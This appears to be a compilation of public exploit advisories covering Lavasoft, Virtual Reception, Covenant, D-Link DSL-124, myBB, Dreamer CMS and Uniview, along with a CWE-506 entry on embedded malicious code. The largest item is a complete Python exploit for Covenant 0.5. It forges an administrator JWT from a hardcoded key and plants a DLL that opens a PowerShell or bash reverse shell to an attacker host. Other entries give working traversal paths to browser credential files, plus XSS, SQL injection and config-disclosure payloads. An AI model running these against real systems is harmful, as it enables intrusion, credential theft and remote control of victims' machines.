Lavasoft version 4.1.0.409 suffers from an unquoted service path vulnerability.

    #Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path# Author: P4p4 M4n3# Discovery Date: 25-11-2022# Vendor Homepage: https://webcompanion.com/en/# Version 4.1.0.409# Tested on:  Microsoft Windows Server 2019 Datacenter x64# Description:# Lavasoft 4.1.0.409 install DCIservice  as a service with an unquoted service path# POC https://youtu.be/yb8AavCMbes #Discover the Unquoted Service pathC:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """DCIService        C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe    Auto  C:\Users\p4p4> sc qc DCIService[SC] QueryServiceConfig réussite(s)SERVICE_NAME: DCIService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : DCIService        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

Lavasoft 4.1.0.409 Unquoted Service Path

Virtual Reception version 1.0 suffers from a directory traversal vulnerability.

    # Exploit Title: Virtual Reception v1.0 - Web Server Directory Traversal# Exploit Author: Spinae# Vendor Homepage: https://www.virtualreception.nl/# Version: win7sp1_rtm.101119-1850 6.1.7601.1.0.65792 running on an Intel NUC5i5RY# Tested on: allWe discovered the web server of the Virtual Reception appliance is prone toan unauthenticated directory traversal vulnerability. This allows anattacker to traverse outside the server root directory by specifying filesat the end of a URL request.This is a NUC5i5RYhttp://[ip address]/c:/WINDOWS/System32/drivers/etc/hostshttp://[ip address]/C:/windows/WindowsUpdate.log...A user called 'receptie' exists on the Windows system:http://[ip address]/c:/users/receptie/ntuser.dathttp://[ip address]/c:/users/receptie/ntuser.inihttp://[ip address]/c:/users/receptie/appdata/local/temp/wmsetup.log...http://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Login Datahttp://[ipaddress]/c:/users/receptie/AppData/Local/Google/Chrome/User%20Data/Local%20Statehttp://[ip address]/c:/users/receptie/AppData/Local/Google/Chrome/UserData/Default/Cookies...The appliance also keeps a log of the visitors that register at theentrance:http://[ip address]/visitors.csvhash icon for shodan searches:https://www.shodan.io/search?query=http.favicon.hash%3A656388049No reply from the vendor (phone, email, website form submissions), firstreported in 2021.-- DISCLAIMER: Unless indicated otherwise, the information contained in this message is privileged and confidential, and is intended only for the use of the addressee(s) named above and others who have been specifically authorized to receive it. If you are not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this message and/or attachments is strictly prohibited. The company accepts no liability for any damage caused by any virus transmitted by this message. Furthermore, the company does not warrant a proper and complete transmission of this information, nor does it accept liability for any delays. If you have received this message in error, please contact the sender and delete the message. Thank you.

Virtual Reception 1.0 Directory Traversal

Covenant version 0.5 suffers from a remote code execution vulnerability.

    # Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)# Exploit Author: xThaz# Author website: https://xthaz.fr/# Date: 2022-09-11# Vendor Homepage: https://cobbr.io/Covenant.html# Software Link: https://github.com/cobbr/Covenant# Version: v0.1.3 - v0.5# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker# Vulnerability## Discoverer: coastal## Date: 2020-07-13## Discoverer website: https://blog.null.farm## References:##   - https://blog.null.farm/hunting-the-hunters##   - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb# !/usr/bin/env python3# encoding: utf-8import jwt  # pip3 install PyJWTimport jsonimport warningsimport base64import reimport randomimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom Crypto.Hash import HMAC, SHA256  # pip3 install pycryptodomefrom Crypto.Util.Padding import padfrom Crypto.Cipher import AESfrom requests import request  # pip3 install requestsfrom subprocess import runfrom pwn import remote, context  # pip3 install pwntoolsfrom os import remove, urandomfrom shutil import whichfrom urllib.parse import urlparsefrom pathlib import Pathfrom time import timedef check_requirements():    if which("mcs") is None:        print("Please install the mono framework in order to compile the payload.")        print("https://www.mono-project.com/download/stable/")        exit(-1)def random_hex(length):    alphabet = "0123456789abcdef"    return ''.join(random.choice(alphabet) for _ in range(length))def request_api(method, token, route, body=""):    warnings.simplefilter('ignore', InsecureRequestWarning)    return request(        method,        f"{args.target}/api/{route}",        json=body,        headers={            "Authorization": f"Bearer {token}",            "Content-Type": "application/json"        },        verify=False    )def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):    secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC'    payload_data = {        "sub": username,        "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",        "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid,        "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [            "User",            "Administrator"        ],        "exp": int(time()) + 360,        "iss": "Covenant",        "aud": "Covenant"    }    token = jwt.encode(payload_data, secret_key, algorithm='HS256')    return tokendef get_id_admin(token, json_roles):    id_admin = ""    for role in json_roles:        if role["name"] == "Administrator":            id_admin = role["id"]            print(f"\t[*] Found the admin group id : {id_admin}")            break    else:        print("\t[!] Did not found admin group id, quitting !")        exit(-1)    id_admin_user = ""    json_users_roles = request_api("get", token, f"users/roles").json()    for user_role in json_users_roles:        if user_role["roleId"] == id_admin:            id_admin_user = user_role["userId"]            print(f"\t[*] Found the admin user id : {id_admin_user}")            break    else:            print("\t[!] Did not found admin id, quitting !")        exit(-1)    json_users = request_api("get", token, f"users").json()    for user in json_users:        if user["id"] == id_admin_user:            username_admin = user["userName"]            print(f"\t[*] Found the admin username : {username_admin}")            return username_admin, id_admin_user    else:            print("\t[!] Did not found admin username, quitting !")        exit(-1)def compile_payload():    if args.os == "windows":        payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""'    else:        payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""'    dll = """using System;using System.Reflection;namespace ExampleDLL{    public class Class1{        public Class1(){        }        public void Main(string[] args){            System.Diagnostics.Process.Start(""" + payload + """);        }    }}"""    temp_dll_path = f"/tmp/{random_hex(8)}"    Path(f"{temp_dll_path}.cs").write_bytes(dll.encode())    print(f"\t[*] Writing payload in {temp_dll_path}.cs")    compilo_path = which("mcs")    compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])    if compilation.returncode:        print("\t[!] Error when compiling DLL, quitting !")        exit(-1)    print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll")    dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()    remove(temp_dll_path + ".cs")    remove(temp_dll_path + ".dll")    print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")    return dll_encodeddef generate_wrapper(dll_encoded):    wrapper = """public static class MessageTransform {    public static string Transform(byte[] bytes) {        try {            string assemblyBase64 = \"""" + dll_encoded + """\";            var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);            var assembly = System.Reflection.Assembly.Load(assemblyBytes);            foreach (var type in assembly.GetTypes()) {                object instance = System.Activator.CreateInstance(type);                object[] args = new object[] { new string[] { \"\" } };                try {                    type.GetMethod(\"Main\").Invoke(instance, args);                }                catch {}            }        }        catch {}        return System.Convert.ToBase64String(bytes);    }    public static byte[] Invert(string str) {        return System.Convert.FromBase64String(str);    }}"""    return wrapperdef upload_profile(token, wrapper):    body = {        'httpUrls': [            '/en-us/index.html',            '/en-us/docs.html',            '/en-us/test.html'        ],        'httpRequestHeaders': [            {'name': 'User-Agent',             'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '                      'Safari/537.36'},            {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}        ],        'httpResponseHeaders': [            {'name': 'Server', 'value': 'Microsoft-IIS/7.5'}        ],        'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',        'httpGetResponse': '{DATA}',        'httpPostResponse': '{DATA}',        'id': 0,        'name': random_hex(8),        'description': '',        'type': 'HTTP',        'messageTransform': wrapper    }    response = request_api("post", token, "profiles/http", body)    if not response.ok:        print("\t[!] Failed to create the listener profile, quitting !")        exit(-1)    else:        profile_id = response.json().get('id')        print(f"\t[*] Profile created with id {profile_id}")        print("\t[*] Successfully created the listener profile")        return profile_iddef generate_valid_listener_port(impersonate_token, tries=0):    if tries >= 10:        print("\t[!] Tried 10 times to generate a listener port but failed, quitting !")        exit(-1)    port = random.randint(8000, 8250)  # TO BE EDITED WITH YOUR TARGET LISTENER PORT    listeners = request_api("get", impersonate_token, "listeners").json()    port_used = []    for listener in listeners:        port_used.append(listener["bindPort"])    if port in port_used:        print(f"\t[!] Port {port} is already taken by another listener, retrying !")        generate_valid_listener_port(impersonate_token, tries + 1)    else:        print(f"\t[*] Port {port} seems free")        return portdef get_id_listener_type(impersonate_token, listener_name):    response = request_api("get", impersonate_token, "listeners/types")    if not response.ok:        print("\t[!] Failed to get the listener type, quitting !")        exit(-1)    else:        for listener_type in response.json():            if listener_type["name"] == listener_name:                print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}')                return listener_type["id"]def generate_listener(impersonate_token, profile_id):    listener_port = generate_valid_listener_port(impersonate_token)    listener_name = random_hex(8)    data = {        'useSSL': False,        'urls': [            f"http://0.0.0.0:{listener_port}"        ],        'id': 0,        'name': listener_name,        'bindAddress': "0.0.0.0",        'bindPort': listener_port,        'connectAddresses': [            "0.0.0.0"        ],        'connectPort': listener_port,        'profileId': profile_id,        'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),        'status': 'Active'    }    response = request_api("post", impersonate_token, "listeners/http", data)    if not response.ok:        print("\t[!] Failed to create the listener, quitting !")        exit(-1)    else:        print("\t[*] Successfully created the listener")        listener_id = response.json().get("id")        return listener_id, listener_portdef create_grunt(impersonate_token, data):    stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]    if stager_code == "":        stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]        if stager_code == "":            print("\t[!] Failed to create the grunt payload, quitting !")            exit(-1)    print("\t[*] Successfully created the grunt payload")    return stager_codedef get_grunt_config(impersonate_token, listener_id):    data = {        'id': 0,        'listenerId': listener_id,        'implantTemplateId': 1,        'name': 'Binary',        'description': 'Uses a generated .NET Framework binary to launch a Grunt.',        'type': 'binary',        'dotNetVersion': 'Net35',        'runtimeIdentifier': 'win_x64',        'validateCert': True,        'useCertPinning': True,        'smbPipeName': 'string',        'delay': 0,        'jitterPercent': 0,        'connectAttempts': 0,        'launcherString': 'GruntHTTP.exe',        'outputKind': 'consoleApplication',        'compressStager': False    }    stager_code = create_grunt(impersonate_token, data)    aes_key = re.search(r'FromBase64String$@\"(.[A-Za-z0-9+\/=]{40,50}?)\"$;', stager_code)    guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code)    if not aes_key or not guid_prefix:        print("\t[!] Failed to retrieve the grunt configuration, quitting !")        exit(-1)    aes_key = aes_key.group(1)    guid_prefix = guid_prefix.group(1)    print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}")    return aes_key, guid_prefixdef aes256_cbc_encrypt(key, message):    iv_bytes = urandom(16)    key_decoded = base64.b64decode(key)    encoded_message = pad(message.encode(), 16)    cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes)    encrypted = cipher.encrypt(encoded_message)    hmac = HMAC.new(key_decoded, digestmod=SHA256)    signature = hmac.update(encrypted).digest()    return encrypted, iv_bytes, signaturedef trigger_exploit(listener_port, aes_key, guid):    message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"    ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)    data = {        "GUID": guid,        "Type": 0,        "Meta": '',        "IV": base64.b64encode(iv).decode(),        "EncryptedMessage": base64.b64encode(ciphered).decode(),        "HMAC": base64.b64encode(signature).decode()    }    json_data = json.dumps(data).encode("utf-8")    payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"    if send_exploit(listener_port, "Cookie", guid, payload):        print("\t[*] Exploit succeeded, check listener")    else :        print("\t[!] Exploit failed, retrying")        if send_exploit(listener_port, "Cookies", guid, payload):            print("\t[*] Exploit succeeded, check listener")        else:            print("\t[!] Exploit failed, quitting")def send_exploit(listener_port, header_cookie, guid, payload):    context.log_level = 'error'    request = f"""POST /en-us/test.html HTTP/1.1\rHost: {IP_TARGET}:{listener_port}\rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\rContent-Type: application/x-www-form-urlencoded\rContent-Length: {len(payload)}\r\r{payload}""".encode()    sock = remote(IP_TARGET, listener_port)    sock.sendline(request)    response = sock.recv().decode()    sock.close()    if "HTTP/1.1 200 OK" in response:        return True    else:        return Falseif __name__ == "__main__":    check_requirements()    parser = argparse.ArgumentParser()    parser.add_argument("target",                        help="URL where the Covenant is hosted, example : https://127.0.0.1:7443")    parser.add_argument("os",                        help="Operating System of the target",                        choices=["windows", "linux"])    parser.add_argument("lhost",                        help="IP of the machine that will receive the reverse shell")    parser.add_argument("lport",                        help="Port of the machine that will receive the reverse shell")    args = parser.parse_args()    IP_TARGET = urlparse(args.target).hostname    print("[*] Getting the admin info")    sacrificial_token = craft_jwt("xThaz")    roles = request_api("get", sacrificial_token, "roles").json()    admin_username, admin_id = get_id_admin(sacrificial_token, roles)    impersonate_token = craft_jwt(admin_username, admin_id)    print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}")    print("[*] Generating payload")    dll_encoded = compile_payload()    wrapper = generate_wrapper(dll_encoded)    print("[*] Uploading malicious listener profile")    profile_id = upload_profile(impersonate_token, wrapper)    print("[*] Generating listener")    listener_id, listener_port = generate_listener(impersonate_token, profile_id)    print("[*] Triggering the exploit")    aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)    trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")

Covenant 0.5 Remote Code Execution

DSL-124 Wireless N300 ADSL2+ suffers from a backup disclosure vulnerability.

    # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure# Date:  2022-11-10# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.dlink.com# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09# Firmware Version: ME_1.00# Tested on: Windows 11# [ Details - DSL-124 ]:#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.# [ Description ]:#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,#and in response to sending this request, she receives a complete backup of the router settings,#In fact this happens because of the lack of management of users and sessions in the network.# [ POC ]:Request :curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgiResponse :HTTP/1.1 200 OKConnection: closeServer: Virtual Web 0.9Content-Type: application/octet-stream;Content-Disposition: attachment;filename="config.img"Pragma: no-cacheCache-Control: no-cache<Config_Information_File_8671><V N="WLAN_WPA_PSK" V="pass@12345"/><V N="WLAN_WPA_PSK_FORMAT" V="0x0"/><V N="WLAN_WPA_REKEY_TIME" V=""/><V N="WLAN_ENABLE_1X" V="0x0"/><V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/><V N="WLAN_RS_IP" V="0.0.0.0"/>...</Config_Information_File_8671>

DSL-124 Wireless N300 ADSL2+ Backup Disclosure

myBB forums version 1.8.26 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)   
# Exploit Author: Andrey Stoykov  
# Software Link: https://mybb.com/versions/1.8.26/  
# Version: 1.8.26  
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =  
"Global Templates"=20  
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=  
late HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing

// HTTP redirect response to specific template

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=  
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1  
[...]

// HTTP GET request to newly created template

GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

<tr class=3D"first">  
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=  
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=  
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>  
[...]

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Management"  
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=  
/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=  
lert(1)</script>&description=3D"><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum

HTTP/1.1 200 OK  
Date: Sun, 20 Nov 2022 11:00:28 GMT  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forums

GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=  
=3D3">"><script>alert(1)</script></a></small>

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Announcements"  
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=  
TTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=  
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=  
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=  
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1

// HTTP response showing successfully added an anouncement

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forum URL

GET /mybb_1826/ HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=  
</a>

--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

myBB forums 1.8.26 Cross Site Scripting

3CX DesktopApp through 18.12.416 has embedded malicious code, as exploited in the wild in March 2023. This affects versions 18.12.407 and 18.12.416 of the Electron Windows application shipped in Update 7, and versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 of the Electron macOS application.

Weakness ID: 506

Abstraction: Class  
Structure: Simple

 Description

The product contains code that appears to be malicious in nature.

 Extended Description

Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend.

 Relationships

This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.

 Relevant to the view "Research Concepts" (CWE-1000)

Nature

Type

ID

Name

ChildOf

Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.

912

Hidden Functionality

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

507

Trojan Horse

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

510

Trapdoor

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

511

Logic/Time Bomb

ParentOf

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.

512

Spyware

 Modes Of Introduction

The different Modes of Introduction provide information about how and when this weakness may be introduced. The Phase identifies a point in the life cycle at which introduction may occur, while the Note provides a typical scenario related to introduction during the given phase.

Phase

Note

Implementation

Bundling

Distribution

Installation

 Common Consequences

This table specifies different individual consequences associated with the weakness. The Scope identifies the application security area that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in exploiting this weakness. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a weakness will be exploited to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.

Scope

Impact

Likelihood

Confidentiality  
Integrity  
Availability  

Technical Impact: _Execute Unauthorized Code or Commands_

 Demonstrative Examples

Example 1

In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.

(bad code)

Example Language: Java 

boolean authorizeCard(String ccn) {

_// Authorize credit card._

_..._

mailCardNumber(ccn, "evil\_developer@evil\_domain.com");

}

 Potential Mitigations

Phase: Testing

Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker.

 Detection Methods

Manual Static Analysis - Binary or Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies
    
*   Generated Code Inspection
    

Effectiveness: SOAR Partial

Dynamic Analysis with Manual Results Interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Automated Monitored Execution
    

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Manual Source Code Review (not inspections)
    

Effectiveness: SOAR Partial

Automated Static Analysis

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

*   Origin Analysis
    

Effectiveness: SOAR Partial

 Memberships

This MemberOf Relationships table shows additional CWE Categories and Views that reference this weakness as a member. This information is often useful in understanding where a weakness fits within the context of external information sources.

Nature

Type

ID

Name

MemberOf

Category - a CWE entry that contains a set of other entries that share a common characteristic.

904

SFP Primary Cluster: Malware

 Notes

Terminology

The term "Trojan horse" was introduced by Dan Edwards and recorded by James Anderson \[18\] to characterize a particular computer security threat; it has been redefined many times \[4,18-20\].

 Taxonomy Mappings

Mapped Taxonomy Name

Node ID

Fit

Mapped Node Name

Landwehr

Malicious

 Content History

More information is available — Please select a different filter.

CVE-2023-29059: CWE-506: Embedded Malicious Code (4.10)

Dreamer CMS version 4.0.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Dreamer CMS v4.0.0 - SQL Injection# Date: 2022/10/02 # Exploit Author: lvren# Vendor Homepage: http://cms.iteachyou.cc/# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip # Version: v4.0.0 # CVE: CVE-2022-43128Proof Of Concept:POST /admin/search/doSearch HTTP/1.1Host: localhost:8888User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 80Origin: http://localhost:8888Connection: closeReferer: http://localhost:8888/admin/search/doSearchCookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739Upgrade-Insecure-Requests: 1entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386lvrenlvren@lvre.ntesmail.com签名由 网易灵犀办公 定制

Dreamer CMS 4.0.0 SQL Injection

Uniview NVR301-04S2-P4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)# Author: Bleron Rrustemi# Discovery Date: 2022-11-15# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/# Datasheet:: https://www.uniview.com/download.do?id=1761643# Device Firmware: NVR-B3801.20.15.200829# Tested Version: NVR301-04S2-P4# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)# Vulnerability Type: Reflected Cross-Site Scripting (XSS)# CVE: N/A  # Proof of Concept:IP=IP of the devicehttp://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>

Uniview NVR301-04S2-P4 Cross Site Scripting

A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.
